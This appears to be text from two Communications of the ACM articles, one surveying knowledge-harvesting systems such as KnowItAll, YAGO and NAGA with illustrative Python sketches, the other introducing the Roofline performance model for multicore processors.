The KnowItAll project at the University of Washington in Seattle has pursued this goal, using techniques that combine pattern matching, linguistic analysis, and statistical learning. KnowItAll starts with a set of seeds: instances of the relation of interest (such as a set of cities or a set of (city, river) pairs). This is the only “training input” KnowItAll needs. It automatically finds sentences on the Web that contain the seeds, extracts linguistic patterns surrounding the seeds, performs statistical analyses to identify strong patterns, and finally selects the most useful patterns as extraction rules. For example, the phrase templates “located in downtown $x” and “$x is located on the banks of $y” may be determined to be good rules for extracting cities and (city, river) pairs, respectively. These rules can then be applied to newly seen Web pages, yielding facts or fact candidates, some of which are in turn considered new, additional seeds. Statistical inference is needed to identify good rules and assess the confidence in the harvested facts.
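The seed, pattern, and fact loop can be sketched in a few lines. This is a simplification under stated assumptions, not KnowItAll's implementation. A pattern is just the literal text between the two arguments of a seed pair. A pattern is kept if at least two distinct seeds support it, which is a crude stand-in for the statistical assessment described above. The sentences are toy data.

```python
import re
from collections import defaultdict


def learn_patterns(sentences, seeds, min_support=2):
    """Collect infix patterns 'X <infix> Y' seen with seed pairs; keep well-supported ones."""
    support = defaultdict(set)
    for s in sentences:
        for x, y in seeds:
            i, j = s.find(x), s.find(y)
            if i != -1 and j > i + len(x):
                support[s[i + len(x):j]].add((x, y))
    return {p for p, seen in support.items() if len(seen) >= min_support}


def apply_patterns(sentences, patterns):
    """Extract new (x, y) candidates: capitalized phrases around a learned infix."""
    facts = set()
    cap = r"([A-Z][a-z]+(?: [A-Z][a-z]+)*)"   # crude stand-in for noun-phrase detection
    for p in patterns:
        regex = re.compile(cap + re.escape(p) + cap)
        for s in sentences:
            facts.update(regex.findall(s))
    return facts


seeds = {("Paris", "Seine"), ("Cologne", "Rhine")}
training = [
    "Paris is located on the banks of the Seine.",
    "Cologne is located on the banks of the Rhine.",
    "Paris hosted a festival near the Seine.",     # supported by one seed only, so dropped
]
patterns = learn_patterns(training, seeds)
print(patterns)  # {' is located on the banks of the '}
new_text = ["Budapest is located on the banks of the Danube."]
print(apply_patterns(new_text, patterns))  # {('Budapest', 'Danube')}
```

The new pair could then be added to the seeds for another round. This feedback is exactly where confidence estimation matters, since one bad seed can pull in bad patterns.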

The TextRunner tool pays special attention to scalability and simplifies the entire fact-gathering pipeline. It has a completely unsupervised bootstrapping phase for identifying simple patterns, just enough to identify noun phrases and verbal patterns with high confidence. When TextRunner sees a new Web page, it aggressively extracts all potentially meaningful instances of all possible binary relation types from the page text; Banko et al. refer to this processing mode as open information extraction, or “machine reading.”
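Open extraction can be caricatured as follows. This toy is not TextRunner's method, which uses a self-trained extractor over noun-phrase chunks. It treats maximal runs of capitalized words as noun phrases and the short text between two adjacent noun phrases as the relation phrase. A relation is kept only if it contains a word from a hypothetical mini-list of verbs. No relation names are fixed in advance.

```python
import re

# Hypothetical stand-in for a part-of-speech tagger: a tiny verb list.
VERBS = {"discovered", "founded", "invented", "is", "was", "won"}
# Crude noun-phrase detector: maximal runs of capitalized words.
NOUN_PHRASE = re.compile(r"[A-Z][a-z]+(?: [A-Z][a-z]+)*")


def open_extract(sentence, max_rel_words=4):
    """Return (arg1, relation, arg2) triples between adjacent capitalized phrases."""
    triples = []
    nps = list(NOUN_PHRASE.finditer(sentence))
    for left, right in zip(nps, nps[1:]):
        rel = sentence[left.end():right.start()].strip()
        words = rel.split()
        if 0 < len(words) <= max_rel_words and VERBS & {w.lower() for w in words}:
            triples.append((left.group(), rel, right.group()))
    return triples


print(open_extract("Marie Curie discovered Polonium. Bill Gates founded Microsoft."))
# [('Marie Curie', 'discovered', 'Polonium'), ('Bill Gates', 'founded', 'Microsoft')]
```

Heuristics this crude produce many false triples on real text. That is why open IE systems depend on redundancy across pages to separate signal from noise.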
Figure 3: Example queries for the YAGO knowledge base.

KnowItAll and TextRunner are examples of Statistical-Web methods for large-scale knowledge acquisition.


YAGO for Large-Scale Semantic Knowledge

Our YAGO project shares with KnowItAll and TextRunner the goal of large-scale knowledge harvesting but emphasizes high accuracy and consistency rather than high recall (coverage). YAGO is best characterized as a Semantic-Web approach, gathering its knowledge primarily by integrating information from Wikipedia and WordNet. It also employs text-mining-based techniques. YAGO contains close to two million entities and about 20 million facts about them, where facts are instances of binary relations. Extensive sampling has shown that YAGO’s accuracy is at least 95%, and many of its errors (false positives) are due to incorrect entries in Wikipedia itself. YAGO is publicly available at www.mpi-inf.mpg.de/yago/.

Two Wikipedia assets, infoboxes and the category system, are almost structured data. Infoboxes are collections of attribute name-value pairs, often based on templates and reused for important types of entities (such as countries, companies, scientists, music bands, and sports teams). For example, the infobox for Max Planck delivers such data as birth_date = April 23, 1858, birth_place = Kiel, death_date = October 4, 1947, nationality = Germany, and alma_mater = Ludwig-Maximilians-Universität München. As for the category system, the Max Planck article is manually placed in such categories as German_Nobel_laureates, Nobel_laureates_in_physics, quantum_physics, and University_of_Munich_alumni. All give YAGO clues about instanceOf relations, so it can infer that the entity Max Planck is an instance of the classes GermanNobelLaureates, NobelLaureatesInPhysics, and UniversityOfMunichAlumni. But YAGO must be careful, as placement in the category quantum_physics does not mean that Max Planck is an instance of QuantumPhysics. The YAGO extractors employ linguistic processing (noun phrase parsing) and mapping rules to achieve high accuracy in harvesting the category information.
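One heuristic in this spirit treats a category as a class only if the head noun of its name is plural. By that test "laureates" and "alumni" qualify, while "physics" does not. It is assumed here for illustration: the function names, the preposition list, and the crude plural test are ours and stand in for real noun-phrase parsing.

```python
PREPOSITIONS = {"in", "of", "from", "for", "at", "by"}
IRREGULAR_PLURALS = {"alumni", "people", "children", "men", "women"}


def is_plural(word):
    """Crude plural test (an assumption); a real system would consult a lexicon such as WordNet."""
    w = word.lower()
    if w in IRREGULAR_PLURALS:
        return True
    # Exclude '-ics' mass nouns (physics), '-ss' (class) and '-us' (genus) endings.
    return w.endswith("s") and not w.endswith(("ss", "ics", "us"))


def head_noun(category):
    """Approximate head: the last word if plural, else the word before the first preposition."""
    tokens = category.split("_")
    if is_plural(tokens[-1]):
        return tokens[-1]
    for i, tok in enumerate(tokens):
        if tok.lower() in PREPOSITIONS and i > 0:
            return tokens[i - 1]
    return tokens[-1]


def category_to_class(category):
    """CamelCase class name for conceptual categories, None for thematic ones."""
    if not is_plural(head_noun(category)):
        return None
    return "".join(t[:1].upper() + t[1:] for t in category.split("_") if t)


for cat in ["German_Nobel_laureates", "Nobel_laureates_in_physics",
            "quantum_physics", "University_of_Munich_alumni"]:
    print(cat, "->", category_to_class(cat))
```

The quantum_physics category maps to None, so it yields no instanceOf fact, which matches the caution described above.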
These examples of YAGO information extraction indicate that relying solely on Wikipedia infoboxes and categories may result in a large but incoherent collection of facts. For example, we may know that Max Planck is an instance of GermanNobelLaureates but be unable to automatically infer that he is also an instance of Germans and of NobelLaureates. Likewise, the fact that he was a physicist does not automatically tell us he was a scientist. To address these shortcomings, YAGO makes intensive use of the WordNet thesaurus (a lightweight ontology), integrating the facts it harvests from Wikipedia with the taxonomic backbone provided by WordNet.
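The benefit of a taxonomic backbone can be sketched as a transitive closure over subclass edges. The class names follow the examples above, but the tiny hierarchy is a hypothetical fragment, not YAGO's actual mapping onto WordNet.

```python
# Hypothetical taxonomy fragment: class -> direct superclasses.
SUBCLASS_OF = {
    "GermanNobelLaureates": {"NobelLaureates", "Germans"},
    "NobelLaureatesInPhysics": {"NobelLaureates", "Physicists"},
    "Physicists": {"Scientists"},
    "Scientists": {"Persons"},
    "NobelLaureates": {"Persons"},
    "Germans": {"Persons"},
}
# Direct instanceOf facts as harvested from categories.
INSTANCE_OF = {"Max_Planck": {"GermanNobelLaureates", "NobelLaureatesInPhysics"}}


def all_classes(entity):
    """Classes reachable from the entity's direct classes via subclass edges (iterative DFS)."""
    seen = set()
    stack = list(INSTANCE_OF.get(entity, ()))
    while stack:
        cls = stack.pop()
        if cls in seen:
            continue
        seen.add(cls)
        stack.extend(SUBCLASS_OF.get(cls, ()))
    return seen


print(sorted(all_classes("Max_Planck")))
```

With the backbone in place, "Max Planck is a German," "is a Nobel laureate," and "is a scientist" all follow without being stated anywhere in Wikipedia.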

While WordNet knows many ab- 
stract classes and the “is-a” and “part- 
of” relationships among them, it has 
only sparse information about indi- 
vidual entities that would populate 
its classes. The wealth of entities in 
Wikipedia complements WordNet 
nicely; conversely, the rigor and exten- 
sive coverage of WordNet’s taxonomy 
compensate for the gaps and noise in
the Wikipedia category system. Each 
individual entity YAGO discovers must 
be mapped into at least one existing 
YAGO class. If this fails, the entity 
and its related facts are not admitted 
into the knowledge base. Analogously, 
classes derived from Wikipedia cat- 
egory names (such as GermanNobel- 
Laureates) must be mapped with a 
subclass relationship to one or more 
superclasses (such as NobelLaure- 
ates and Germans). These procedures 
ensure that YAGO maintains a con- 
sistent knowledge base, where con- 
sistency eliminates dangling entities 
and classes and guarantees that the 
subclass relation is acyclic. 
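The two admission checks just described can be sketched as follows. The first requires every entity to map to at least one known class. The second requires the subclass relation to stay acyclic. The function names and in-memory dictionaries are hypothetical. The cycle test is a standard three-color depth-first search.

```python
def admit_entity(entity, candidate_classes, known_classes, instance_of):
    """Add the entity only if at least one candidate class already exists in the taxonomy."""
    mapped = {c for c in candidate_classes if c in known_classes}
    if not mapped:
        return False  # dangling entity: rejected together with its facts
    instance_of.setdefault(entity, set()).update(mapped)
    return True


def has_cycle(subclass_of):
    """Detect a cycle in the subclass graph (child -> set of parents) with a three-color DFS."""
    WHITE, GRAY, BLACK = 0, 1, 2
    color = {}

    def visit(node):
        color[node] = GRAY
        for parent in subclass_of.get(node, ()):
            state = color.get(parent, WHITE)
            if state == GRAY:
                return True
            if state == WHITE and visit(parent):
                return True
        color[node] = BLACK
        return False

    return any(color.get(n, WHITE) == WHITE and visit(n) for n in list(subclass_of))


def add_subclass(child, parent, subclass_of):
    """Insert child -> parent only if the subclass relation remains acyclic."""
    subclass_of.setdefault(child, set()).add(parent)
    if has_cycle(subclass_of):
        subclass_of[child].discard(parent)
        return False
    return True


# Hypothetical usage.
taxonomy = {"GermanNobelLaureates": {"NobelLaureates"}, "NobelLaureates": {"Persons"}}
known = {"GermanNobelLaureates", "NobelLaureates", "Persons"}
instances = {}
print(admit_entity("Max_Planck", {"GermanNobelLaureates", "QuantumPhysics"}, known, instances))  # True
print(admit_entity("Some_Topic", {"QuantumPhysics"}, known, instances))  # False
print(add_subclass("Persons", "GermanNobelLaureates", taxonomy))  # False: would close a cycle
print(add_subclass("Physicists", "Persons", taxonomy))  # True
```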
Kylin/KOG. The “Intelligence in Wikipedia” project also extracts information from Wikipedia through its tools Kylin and Kylin Ontology Generator (KOG). Whenever an infobox type includes an attribute in some articles but the attribute has no value for a given article, Kylin analyzes the full text of the article to derive the most likely value. Like KnowItAll and TextRunner (but unlike Libra, Cimple, and YAGO), Kylin pursues open extraction by considering all potentially significant attributes, even if they occur only sparsely in the entire Wikipedia corpus. KOG builds on Kylin’s output, unifies attribute names, derives type signatures, and (like YAGO) maps these entities onto the WordNet taxonomy through statistical relational learning. KOG goes beyond YAGO by discovering new relationship types. It builds on the class system of both YAGO and DBpedia, along with the entities in each class, to train its learning algorithms for generating the subsumption graph among classes.

The Kylin/KOG project combines all 
three knowledge-gathering paradigms: 
Semantic-Web-oriented by being tar- 
geted at infoboxes; Social-Web-based 
by leveraging the input of the large 
Wikipedia community; and Statistical- 
Web-style through learning methods. 


Searching and Ranking YAGO with NAGA

The query language we designed for YAGO adopts concepts from the standardized SPARQL Protocol and RDF Query Language for RDF data but extends them through more expressive pattern matching and ranking. The prototype system that implements these features is called NAGA (for Not Another Google Answer, www.mpi-inf.mpg.de/yago/). Viewing the knowledge base as a graph, users and programmers alike can construct a query with the help of subgraph templates; Figure 3 outlines three examples related to the question scenarios discussed earlier.


The leftmost query in Figure 3, about politicians who are also scientists, shows two nodes matched by the desired results and one node (labeled $x) denoting a variable for which the query must find all bindings. The edge labels denote relationships and need to be matched by the results. Here, “isa” is shorthand for a composition of two connected edges that correspond to the relationships instanceOf (between an entity and a class) and subclass (between two classes). This way the user also finds people who belong to the classes “mayor” and “physicist.”
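The “isa” shorthand can be sketched over a toy triple set: match one instanceOf edge, then follow subclass edges any number of times. The triples are hypothetical illustrations rather than YAGO content, and the functions are not NAGA's query processor.

```python
# Hypothetical toy knowledge graph as (subject, predicate, object) triples.
TRIPLES = {
    ("Alice", "instanceOf", "Mayor"),
    ("Alice", "instanceOf", "Physicist"),
    ("Bob", "instanceOf", "Mayor"),
    ("Carol", "instanceOf", "Chemist"),
    ("Mayor", "subclass", "Politician"),
    ("Physicist", "subclass", "Scientist"),
    ("Chemist", "subclass", "Scientist"),
}


def superclasses(cls):
    """cls plus everything reachable via subclass edges (reflexive-transitive closure)."""
    result, frontier = {cls}, [cls]
    while frontier:
        c = frontier.pop()
        for s, p, o in TRIPLES:
            if s == c and p == "subclass" and o not in result:
                result.add(o)
                frontier.append(o)
    return result


def isa(entity, cls):
    """isa = instanceOf followed by zero or more subclass edges."""
    return any(s == entity and p == "instanceOf" and cls in superclasses(o)
               for s, p, o in TRIPLES)


def query_x(*classes):
    """All bindings of $x such that isa($x, C) holds for every requested class C."""
    entities = {s for s, p, _ in TRIPLES if p == "instanceOf"}
    return {x for x in entities if all(isa(x, c) for c in classes)}


print(query_x("Politician", "Scientist"))  # {'Alice'}
```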


The query in the middle of Figure 3 (a simpler variant of the German-Nobel-laureate question) generalizes the point about labels referring to compositions of relations. The label (bornIn|livesIn|citizenOf).locatedIn* is a regular expression that allows users to avoid overspecifying their information demand. We may be generous when we call a person German, and the locatedIn relationship often reflects geographical hierarchies (such as with cities, counties, states, and countries).
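A label such as (bornIn|livesIn|citizenOf).locatedIn* can be evaluated as a two-step reachability search: one edge from the alternation, then any number of locatedIn edges. This is a hand-coded sketch over a few illustrative facts, not a general regular-expression engine over graphs.

```python
from collections import deque

# Illustrative toy facts as (subject, predicate, object) edges.
EDGES = [
    ("Max_Planck", "bornIn", "Kiel"),
    ("Kiel", "locatedIn", "Schleswig-Holstein"),
    ("Schleswig-Holstein", "locatedIn", "Germany"),
    ("Albert_Einstein", "bornIn", "Ulm"),
    ("Ulm", "locatedIn", "Baden-Wuerttemberg"),
    ("Baden-Wuerttemberg", "locatedIn", "Germany"),
    ("Niels_Bohr", "bornIn", "Copenhagen"),
    ("Copenhagen", "locatedIn", "Denmark"),
]


def follow(node, labels):
    """Targets reachable from node over one edge whose label is in labels."""
    return {o for s, p, o in EDGES if s == node and p in labels}


def matches(person, target, first=("bornIn", "livesIn", "citizenOf"), closure="locatedIn"):
    """Check person -(first alternation)-> place -(closure)*-> target with a BFS."""
    start = follow(person, set(first))
    seen, queue = set(start), deque(start)
    while queue:
        place = queue.popleft()
        if place == target:
            return True
        for nxt in follow(place, {closure}):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return False


people = ["Max_Planck", "Albert_Einstein", "Niels_Bohr"]
print([p for p in people if matches(p, "Germany")])  # ['Max_Planck', 'Albert_Einstein']
```

The star is what spares the user from knowing whether a birthplace is recorded at the level of a city, a state, or a country.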

The rightmost query of Figure 3 is a broad relatedness query that looks for commonalities or other connections among several entities. Here again, users or programmers would use regular expressions as edge labels in the query’s graph template.

NAGA queries often return too many results and so must rank them. For example, a query like “What is known about Einstein?,” which may be phrased as a single-edge graph pattern isa(Einstein, $y), returns dozens if not hundreds of results, including many uninteresting ones like isa(Einstein, Entity), isa(Einstein, Organism), and isa(Einstein, Colleague). Ranking such results is much more difficult than in traditional search engines, as the system must consider the graph structure in both queries and results. Three general criteria must be accommodated:

Informativeness. Users prefer informative answers: salient or interesting facts, as opposed to overly generic facts or facts that are trivially known already. In the example query about Einstein, the user would prefer the answers isa(Einstein, Physicist) or isa(Einstein, NobelLaureate) over the near-trivial results or a nontrivial but still less important fact like isa(Einstein, Vegetarian). However, when asking a different query about noteworthy vegetarians, the latter fact should be one of the highest-ranked results. Informativeness is a query-dependent (and potentially user-and-situation-dependent) notion;

Confidence. Users may occasionally find uncertain, dubious, or false statements in the YAGO knowledge base. Each fact is annotated with a confidence value derived from the fact’s original data sources and the extraction methods YAGO used. The quality of the sources tapped by YAGO can be quantified in terms of authority and trust measures in the spirit of Google’s PageRank, and the quality of different extractors can be empirically assessed. Various ways are available for combining these measures into a single confidence value, and high-confidence answers are preferred; and

Compactness. Whenever a query returns paths or graphs rather than individual nodes, we are interested in compact graphs and short paths. For example, a query about how Einstein and Bohr are related should return a short answer path that says something like “both are physicists,” rather than a convoluted answer like “Einstein was a vegetarian like Tom Cruise who was born in the same year Bohr died.”
A good ranking function is needed to combine all three criteria. Here, we sketch our approach for informativeness. We developed for NAGA a new kind of statistical LM for graph-structured data and queries. The parameters of the model are estimated from corpus or workload statistics. Consider the simple queries isa(Einstein, $y) about Einstein and bornIn($y, Frankfurt) about people born in Frankfurt. For the Einstein query, YAGO estimates the conditional co-occurrence probabilities

$$\frac{P[\mathrm{Einstein} \wedge \mathrm{Physicist}]}{P[\mathrm{Einstein}]} \quad\text{and}\quad \frac{P[\mathrm{Einstein} \wedge \mathrm{Vegetarian}]}{P[\mathrm{Einstein}]}$$

to compare and rank two possible answers. For the Frankfurt query, YAGO computes and compares

$$\frac{P[\mathrm{Goethe} \wedge \mathrm{bornIn} \wedge \mathrm{Frankfurt}]}{P[\mathrm{bornIn} \wedge \mathrm{Frankfurt}]} \quad\text{against}\quad \frac{P[\mathrm{Weikum} \wedge \mathrm{bornIn} \wedge \mathrm{Frankfurt}]}{P[\mathrm{bornIn} \wedge \mathrm{Frankfurt}]},$$

clearly favoring Goethe as a top result.
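Assume that probabilities are estimated from co-occurrence counts in a corpus of "witness" documents. Under that simplification, the ratios above reduce to counting. The documents below are a hypothetical toy corpus, not YAGO's estimation data, and the function name is ours.

```python
def conditional_cooccurrence(corpus, answer_terms, condition_terms):
    """Estimate P[answer and condition] / P[condition] from document-level co-occurrence.

    corpus: list of sets of terms, one set per (hypothetical) witness document.
    """
    cond = [doc for doc in corpus if condition_terms <= doc]
    if not cond:
        return 0.0
    both = [doc for doc in cond if answer_terms <= doc]
    return len(both) / len(cond)


# Hypothetical toy corpus.
corpus = [
    {"Einstein", "Physicist", "relativity"},
    {"Einstein", "Physicist", "Nobel"},
    {"Einstein", "Vegetarian"},
    {"Einstein", "Physicist"},
    {"Goethe", "bornIn", "Frankfurt"},
    {"Goethe", "bornIn", "Frankfurt", "poet"},
    {"Weikum", "bornIn", "Frankfurt"},
]
einstein_answers = {
    y: conditional_cooccurrence(corpus, {y}, {"Einstein"}) for y in ("Physicist", "Vegetarian")
}
print(einstein_answers)  # {'Physicist': 0.75, 'Vegetarian': 0.25}
frankfurt_answers = {
    x: conditional_cooccurrence(corpus, {x}, {"bornIn", "Frankfurt"}) for x in ("Goethe", "Weikum")
}
print(max(frankfurt_answers, key=frankfurt_answers.get))  # Goethe
```

A production model would need smoothing for rare entities, because a raw ratio of small counts can put an obscure answer on top.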

This LM-based ranking allows NAGA to rank politicians who are also scientists with high informativeness, with Benjamin Franklin, Angela Merkel, and other prominent figures showing up in the top ranks. So while the YAGO knowledge base is primarily a Semantic-Web endeavor, the ranking for its search engine is built on Statistical-Web assets.
Despite good progress, these approaches face three notable challenges:

Scalable harvesting. Most new knowledge is produced in textual form (such as in scientific publications). Methods for natural-language IE face inherent trade-offs regarding training effort vs. easy deployment and precision vs. recall of the results. Scaling up the IE machinery for higher throughput without sacrificing quality is a formidable problem. For example, can IE tools process all blog postings on the planet at the same rate they are produced, without missing relevant facts or producing too many false positives?

Expressive ranking. The LM-based 
ranking models pursued by Libra and 
NAGA should be extended to better
capture the context of the user and the 
data. User context requires personal- 
ized and task-specific LMs that consid- 
er current location, time, short-term 
history, and intention in the user’s dig- 
ital traces. Data context calls for LMs 
for entity-relationship graphs, aiming 
to better model complex patterns be- 
yond single facts (edges) and consider 
types; and 

Efficient search. Evaluating complex query predicates over graphs is computationally difficult. Moreover, the need for ranking suggests that the system should avoid materializing overly large numbers of results and instead aim to compute only the top-k results efficiently.
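Fagin's Threshold Algorithm (TA) is one well-known way to get the top-k results without scoring every candidate. We show it only as an example of the technique, not as NAGA's query processor. Each list is sorted by descending partial score, and the aggregate is a sum of nonnegative scores. At each depth, the threshold is the sum of the scores just read from every list. The algorithm stops once the k-th best aggregate seen so far reaches that threshold. The example lists are hypothetical.

```python
import heapq


def threshold_topk(lists, k):
    """Top-k objects by summed score using Fagin's Threshold Algorithm.

    lists: list of lists of (object, score), each sorted by descending nonnegative score.
    Random access is simulated with per-list dictionaries; a missing object scores 0.
    """
    lookup = [dict(lst) for lst in lists]
    best = {}                                   # object -> full aggregate score
    max_depth = max(len(lst) for lst in lists)
    for depth in range(max_depth):
        threshold = 0.0
        for lst in lists:
            if depth < len(lst):
                obj, score = lst[depth]         # sorted access
                threshold += score
                if obj not in best:             # random access into every list
                    best[obj] = sum(d.get(obj, 0.0) for d in lookup)
        top = heapq.nlargest(k, best.items(), key=lambda kv: kv[1])
        if len(top) == k and top[-1][1] >= threshold:
            return top                          # no unseen object can beat the k-th best
    return heapq.nlargest(k, best.items(), key=lambda kv: kv[1])


def brute_force_topk(lists, k):
    """Reference answer: score every object."""
    totals = {}
    for lst in lists:
        for obj, score in lst:
            totals[obj] = totals.get(obj, 0.0) + score
    return heapq.nlargest(k, totals.items(), key=lambda kv: kv[1])


lists = [
    [("a", 0.9), ("b", 0.8), ("c", 0.3), ("d", 0.1)],
    [("b", 0.9), ("c", 0.7), ("a", 0.2), ("d", 0.1)],
]
print([obj for obj, _ in threshold_topk(lists, 2)])  # ['b', 'a']
```

Here TA stops after reading three entries per list and never touches "d," which is the kind of saving that matters when the lists hold millions of graph matches.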

On a grander scale is the question of which paradigm is most appropriate. The three avenues toward comprehensive knowledge harvesting (Semantic, Statistical, and Social Web) are by no means mutually exclusive. The projects outlined here combine aspects of several of these directions. Deeper understanding of the feedback between and synergies among the three paradigms is an overriding theme of great potential value to researchers. Semantic-Web sources can be powerful bootstrap tools for large-scale Statistical-Web mining. Statistical-Web tools may produce many false hypotheses, but these can be assessed on Social-Web platforms with large communities of users that engage in human-computing tasks. Social-Web endeavors in turn are often grassroots catalysts for developing high-value knowledge repositories that eventually become Semantic-Web assets; examples are Wikipedia and derived knowledge bases (such as YAGO and DBpedia).


Conclusion 

We have presented motivations for 
and approaches toward integrating 
the historically separated DB and IR 
methodologies. While deep DB/IR in- 
tegration may be wishful thinking, at 
least for the time being, we observe 
strong trends toward adopting IR con- 
cepts in the DB world and vice versa. 
In addition to applications that must 
be able to manage structured and un- 
structured data or highly heteroge- 
neous information sources, we also 
see increasing interest and success in 
extracting entities and relationships
from text sources. The envisioned 
path toward automatically building 
and growing comprehensive knowl- 
edge bases with expressive search and 
ranking capabilities may take a long 
time to mature. In any case, it is an 
exciting and rewarding challenge that 
should appeal to and benefit from in- 
novation in several research commu- 
nities, most notably DB and IR. 
The Roofline model offers insight on how to improve the performance of software and hardware.

Roofline: An Insightful Visual Performance Model for Multicore Architectures


design. The relatively recent switch to multicore means that microprocessors will become more diverse, since no conventional wisdom has yet emerged concerning their design. For example, some offer many simple processors vs. fewer complex processors, some depend on multithreading, and some even replace caches with explicitly addressed local stores. Manufacturers will likely offer multiple products with differing numbers of cores to cover multiple price-performance points, since Moore’s Law will permit the doubling of the number of cores per chip every two years. While diversity may be understandable in this time of uncertainty, it exacerbates the already difficult jobs of programmers, compiler writers, and even architects. Hence, an easy-to-understand model that offers performance guidelines would be especially valuable.

APRIL 2009 VOL. 52 NO. 4 COMMUNICATIONS OF THE ACM 65

contributed articles

Such a model need not be perfect, just insightful. The 3Cs (compulsory, capacity, and conflict misses) model for caches is an analogy. It is not perfect, as it ignores potentially important factors like block size, block-allocation policy, and block-replacement policy. It also has quirks; for example, a miss might be labeled “capacity” in one design and “conflict” in another cache of the same size. Yet the 3Cs model has been popular for nearly 20 years precisely because it offers insight into the behavior of programs, helping programmers, compiler writers, and architects improve their respective designs.

Here, we propose one such model 
we call Roofline, demonstrating it on 
four diverse multicore computers us- 
ing four key floating-point kernels. 


Performance Models 

Stochastic analytical models and statistical performance models can accurately predict program performance on multiprocessors but rarely provide insight into how to improve the performance of programs, compilers, and computers, and they can be difficult for nonexperts to use.

An alternative, simpler approach is “bound and bottleneck analysis.” Rather than try to predict performance, it provides “valuable insight into the primary factors affecting the performance of computer systems. In particular, the critical influence of the system bottleneck is highlighted and quantified.”

The best-known example of a performance bound is surely Amdahl’s Law, which says the performance gain of a parallel computer is limited by the serial portion of a parallel program; it was recently applied to heterogeneous multicore computers.
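In its classic form, suppose a fraction f of the work can be spread perfectly across p processors and the rest stays serial. The speedup is then 1 / ((1 - f) + f / p), which can never exceed 1 / (1 - f) however large p grows. A minimal sketch, with the parallel fraction 0.9 chosen only for illustration:

```python
def amdahl_speedup(parallel_fraction, processors):
    """Amdahl's Law: speedup of a program whose parallel part scales perfectly."""
    serial = 1.0 - parallel_fraction
    return 1.0 / (serial + parallel_fraction / processors)


# With 90% parallel work the speedup creeps toward, but never reaches, 1 / 0.1 = 10.
for p in (2, 8, 64, 1024):
    print(p, round(amdahl_speedup(0.9, p), 2))
```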


Roofline Model 

For the foreseeable future, off-chip memory bandwidth will often be the constraining resource in system performance. Hence, we want a model that relates processor performance to off-chip memory traffic. Toward this goal, we use the term “operational intensity” to mean operations per byte of DRAM traffic, defining total bytes accessed as those bytes that go to the main memory after they have been filtered by the cache hierarchy. That is, we measure traffic between the caches and memory rather than between the processor and the caches. Thus, operational intensity predicts the DRAM bandwidth needed by a kernel on a particular computer.
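As a worked example under stated assumptions, consider a STREAM-triad-style loop a[i] = b[i] + s*c[i] over double-precision arrays far larger than the caches. Each iteration performs 2 flops. If every array element crosses the DRAM interface exactly once, each iteration moves 24 bytes: two 8-byte reads and one 8-byte write. A write-allocate cache that first reads a[i] would add another 8 bytes. The array length and the function name are ours.

```python
def operational_intensity(flops, dram_bytes):
    """Flops per byte of DRAM traffic (traffic measured after cache filtering)."""
    return flops / dram_bytes


n = 10_000_000                     # array length, assumed much larger than the caches
flops = 2 * n                      # one add + one multiply per element
bytes_no_write_allocate = 3 * 8 * n
bytes_write_allocate = 4 * 8 * n   # extra read of a[i] before it is overwritten

print(operational_intensity(flops, bytes_no_write_allocate))  # 0.08333333333333333
print(operational_intensity(flops, bytes_write_allocate))     # 0.0625
```

Both values sit well left of the 0.25 Flops/Byte at which the Figure 1 axis begins, so such a kernel is firmly memory-bound.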

We say “operational intensity” instead of, say, “arithmetic intensity” or “machine balance” for two reasons. First, arithmetic intensity and machine balance measure traffic between the processor and the cache, whereas efficiency-level programmers want to measure traffic between the caches and DRAM. This subtle change allows them to include memory optimizations of a computer into our bound-and-bottleneck model. Second, we think the model will work with kernels where the operations are not arithmetic, as discussed later, so we needed a more general term than “arithmetic.”
The proposed Roofline model ties together floating-point performance, operational intensity, and memory performance in a 2D graph. Peak floating-point performance can be found through hardware specifications or microbenchmarks. The working sets of the kernels we consider here do not fit fully in on-chip caches, so peak memory performance is defined by the memory system behind the caches. Although one can find memory performance through the STREAM benchmark, for this work we wrote a series of progressively optimized microbenchmarks designed to determine sustainable DRAM bandwidth. They include all techniques to get the best memory performance, including prefetching and data alignment. (See Section A.1 in the online Appendix (footnote a) for more detail on how to measure processor and memory performance and operational intensity.)

Figure 1: Roofline model for (a) AMD Opteron X2 and (b) Opteron X2 vs. Opteron X4.

Figure 1a outlines the model for a 2.2GHz AMD Opteron X2 model 2214 in a dual-socket system. The graph is on a log-log scale. The y-axis is attainable floating-point performance. The x-axis is operational intensity, varying from 0.25 Flops/DRAM byte-accessed to 16 Flops/DRAM byte-accessed. The system being modeled has peak double-precision floating-point performance of 17.6 GFlops/sec and peak memory bandwidth of 15GB/sec from our benchmark. This latter measure is the steady-state bandwidth potential of the memory in a computer, not the pin bandwidth of the DRAM chips.

One can plot a horizontal line show- 
ing peak floating-point performance 
of the computer. The actual floating- 
point performance of a floating-point 
kernel can be no higher than the hori- 
zontal line, since this line is the hard- 
ware limit. 

How might we plot peak memory performance? Since the x-axis is Flops per Byte and the y-axis is GFlops/sec, gigabytes per second (GB/sec), or equivalently (GFlops/sec)/(Flops/Byte), is just a line of unit slope in Figure 1. Hence, we can plot a second line that bounds the maximum floating-point performance that the memory system of the computer can support for a given operational intensity. This formula drives the two performance limits in the graph in Figure 1a:

$$\text{Attainable GFlops/sec} = \min\left(\text{Peak Floating-Point Performance},\ \text{Peak Memory Bandwidth} \times \text{Operational Intensity}\right)$$


The two lines intersect at the point 
of peak computational performance 
and peak memory bandwidth. Note that 
these limits are created once per multi- 
core computer, not once per kernel. 
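The bound is a one-liner. The sketch below plugs in the Opteron X2 figures quoted above (17.6 GFlops/sec peak, 15 GB/sec measured bandwidth) and also computes the ridge point as peak divided by bandwidth. The function names are ours. With these two numbers the ridge point is 17.6/15, about 1.17 Flops/Byte; the comparison with the Opteron X4 later in the article quotes it as 1.0.

```python
def attainable_gflops(peak_gflops, peak_gb_per_s, operational_intensity):
    """Roofline bound: min(peak compute, peak memory bandwidth x operational intensity)."""
    return min(peak_gflops, peak_gb_per_s * operational_intensity)


def ridge_point(peak_gflops, peak_gb_per_s):
    """Minimum operational intensity (Flops/Byte) needed to reach peak compute."""
    return peak_gflops / peak_gb_per_s


X2_PEAK, X2_BW = 17.6, 15.0   # Opteron X2 values from the text
for oi in (0.25, 0.5, 1.0, 2.0, 4.0, 8.0, 16.0):
    bound = attainable_gflops(X2_PEAK, X2_BW, oi)
    kind = "memory-bound" if X2_BW * oi < X2_PEAK else "compute-bound"
    print(f"{oi:5.2f} Flops/Byte -> {bound:5.2f} GFlops/sec ({kind})")
print(f"ridge point: {ridge_point(X2_PEAK, X2_BW):.2f} Flops/Byte")  # ridge point: 1.17 Flops/Byte
```

Because the roofs depend only on the machine, the loop above is computed once per computer and then reused for every kernel.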

